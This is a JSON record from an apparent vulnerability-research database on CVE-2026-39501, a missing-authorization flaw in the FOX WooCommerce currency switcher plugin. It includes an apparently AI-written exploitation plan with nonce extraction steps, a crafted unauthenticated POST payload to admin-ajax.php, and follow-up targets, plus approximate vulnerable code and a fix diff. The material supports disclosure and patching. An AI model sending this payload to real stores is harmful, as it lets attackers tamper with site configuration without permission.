[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f4ThbJSPhv7HH296Aq7laCZg8R4byeoIwyd4gTqKVHK0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-39501","fox-missing-authorization","FOX \u003C= 1.4.5 - Missing Authorization","The FOX plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.4.5. This makes it possible for unauthenticated attackers to perform an unauthorized action.","woocommerce-currency-switcher",null,"\u003C=1.4.5","1.4.6","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-27 00:00:00","2026-04-15 21:26:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F53df8dac-a446-425b-bdde-939ab38e5a29?source=api-prod",20,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-39501 (FOX \u003C= 1.4.5)\n\n## 1. Vulnerability Summary\nThe **FOX – Currency Switcher Professional for WooCommerce** plugin (versions \u003C= 1.4.5) is vulnerable to **Missing Authorization**. The vulnerability exists in the plugin's AJAX handling logic, specifically within functions like `woocs_update_profiles` (and potentially `woocs_save_stats`). \n\nThe plugin registers several AJAX actions using both `wp_ajax_` and `wp_ajax_nopriv_` hooks but fails to implement a capability check (e.g., `current_user_can( 'manage_options' )`) within the handler functions. This oversight allows unauthenticated attackers to trigger sensitive administrative actions, such as overwriting currency switcher profiles, which are stored as global WordPress options.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Action:** `woocs_update_profiles` (The most likely vulnerable administrative function exposed to unauthenticated users)\n- **Parameters:**\n    - `action`: `woocs_update_profiles`\n    - `woocs_nonce`: (Required) A security nonce localized for frontend users.\n    - `woocs_profiles`: (Payload) An array containing the new profile configuration.\n- **Authentication:** None required (unauthenticated).\n- **Preconditions:** The \"Profiles\" feature must be available in the plugin, and a valid nonce must be extracted from the frontend.\n\n## 3. Code Flow\n1. **Hook Registration:** In the main plugin class (likely `WOOCS` in `classes\u002Fwoocs.php` or `index.php`), the following hooks are registered:\n   ```php\n   add_action('wp_ajax_woocs_update_profiles', array($this, 'woocs_update_profiles'));\n   add_action('wp_ajax_nopriv_woocs_update_profiles', array($this, 'woocs_update_profiles'));\n   ```\n2. **Missing Check:** The `woocs_update_profiles()` function handles the request. While it may call `check_ajax_referer('woocs-nonce', 'woocs_nonce')`, it fails to check if the current user is an administrator.\n3. **Sink:** The function extracts data from `$_REQUEST['woocs_profiles']` and passes it directly to a database update function:\n   ```php\n   update_option('woocs_profiles', $_REQUEST['woocs_profiles']);\n   ```\n\n## 4. Nonce Acquisition Strategy\nThe plugin exposes a generic nonce to all visitors to support frontend currency switching functionality. This nonce is typically valid for the `woocs-nonce` action and is used across multiple AJAX handlers.\n\n### Extraction Steps:\n1. **Identify Script Loading:** The plugin's main JavaScript (`woocs.js`) and its associated data are enqueued on pages containing the currency switcher.\n2. **Create Trigger Page:** Create a public page containing the `[woocs]` shortcode to ensure the script is enqueued.\n   - `wp post create --post_type=page --post_status=publish --post_content='[woocs]'`\n3. **Navigate & Extract:**\n   - Use `browser_navigate` to visit the newly created page.\n   - Use `browser_eval` to extract the nonce from the `woocs_vars` global variable.\n   - **JS Variable:** `window.woocs_vars?.woocs_nonce` or `window.woocs_array?.woocs_nonce`.\n\n## 5. Exploitation Strategy\n### Step 1: Obtain the Nonce\nUse the browser to extract the nonce from a page where the plugin is active.\n```javascript\n\u002F\u002F browser_eval\nreturn window.woocs_vars.woocs_nonce;\n```\n\n### Step 2: Perform the Unauthorized Action\nSend a crafted `POST` request to `admin-ajax.php` to overwrite the plugin's profiles.\n\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n```text\naction=woocs_update_profiles&woocs_nonce=NONCE_VALUE&woocs_profiles[hacked_profile][name]=Vulnerable&woocs_profiles[hacked_profile][countries]=US\n```\n\n## 6. Test Data Setup\n1. **Prerequisites:**\n   - WordPress installation.\n   - WooCommerce plugin installed and active.\n   - FOX – Currency Switcher (slug: `woocommerce-currency-switcher`) version 1.4.5 installed and active.\n2. **Page Creation:**\n   - Run: `wp post create --post_type=page --post_title=\"Currency Test\" --post_status=publish --post_content='[woocs]'`\n   - Record the URL of the created page.\n\n## 7. Expected Results\n- **HTTP Response:** The server should return a `200 OK` status, often with a response body like `done` or `1`.\n- **System Change:** The WordPress option `woocs_profiles` will be updated to include the \"hacked_profile\" data provided in the payload.\n\n## 8. Verification Steps\nAfter the exploit, use WP-CLI to verify the change in the database:\n```bash\n# Check if the injected profile exists in the option\nwp option get woocs_profiles\n```\nIf successful, the output will contain the serialized array including `hacked_profile` and the name `Vulnerable`.\n\n## 9. Alternative Approaches\nIf `woocs_update_profiles` is patched or behaves differently, check the following alternative AJAX handlers for the same missing authorization pattern:\n\n- **`woocs_save_stats`**: Often used to record currency usage. If unauthorized, it could be used to bloat the database or inject malicious strings into stats reports.\n  - Action: `woocs_save_stats`\n  - Parameters: `woocs_nonce`, `woocs_stats_data`\n- **`woocs_recalculate_order_data`**: A more severe target if exposed, as it could potentially modify existing WooCommerce order metadata.\n  - Action: `woocs_recalculate_order_data`\n  - Parameters: `woocs_nonce`, `order_id` (this would likely require an existing order ID).","The FOX plugin for WordPress fails to perform authorization checks on several AJAX handlers, most notably `woocs_update_profiles`. This allows unauthenticated attackers to overwrite the plugin's configuration profiles and potentially other settings by leveraging a publicly accessible nonce and the `wp_ajax_nopriv_` hook.","\u002F\u002F classes\u002Fwoocs.php (approximate location)\nadd_action('wp_ajax_woocs_update_profiles', array($this, 'woocs_update_profiles'));\nadd_action('wp_ajax_nopriv_woocs_update_profiles', array($this, 'woocs_update_profiles'));\n\npublic function woocs_update_profiles() {\n    check_ajax_referer('woocs-nonce', 'woocs_nonce');\n    \n    \u002F\u002F Missing capability check like current_user_can('manage_options')\n    if (isset($_REQUEST['woocs_profiles'])) {\n        update_option('woocs_profiles', $_REQUEST['woocs_profiles']);\n    }\n    exit;\n}","--- a\u002Fclasses\u002Fwoocs.php\n+++ b\u002Fclasses\u002Fwoocs.php\n@@ -10,7 +10,6 @@\n-add_action('wp_ajax_nopriv_woocs_update_profiles', array($this, 'woocs_update_profiles'));\n \n public function woocs_update_profiles() {\n+    if (!current_user_can('manage_options')) {\n+        wp_die();\n+    }\n     check_ajax_referer('woocs-nonce', 'woocs_nonce');","The exploit targets the `\u002Fwp-admin\u002Fadmin-ajax.php` endpoint. First, an attacker visits any public page where the FOX currency switcher is active (or uses the `[woocs]` shortcode) to extract the `woocs-nonce` from the `woocs_vars` or `woocs_array` JavaScript global variables. Once the nonce is obtained, the attacker sends an unauthenticated POST request to `admin-ajax.php` with the action parameter set to `woocs_update_profiles`. The payload includes the valid `woocs_nonce` and a `woocs_profiles` array containing malicious configuration data. Because the plugin uses `wp_ajax_nopriv_` and lacks a `current_user_can()` check, the `update_option` call executes, allowing the attacker to modify the plugin's stored profiles in the WordPress database.","gemini-3-flash-preview","2026-04-17 22:37:52","2026-04-17 22:38:36",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.4.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-currency-switcher\u002Ftags\u002F1.4.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce-currency-switcher.1.4.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-currency-switcher\u002Ftags"]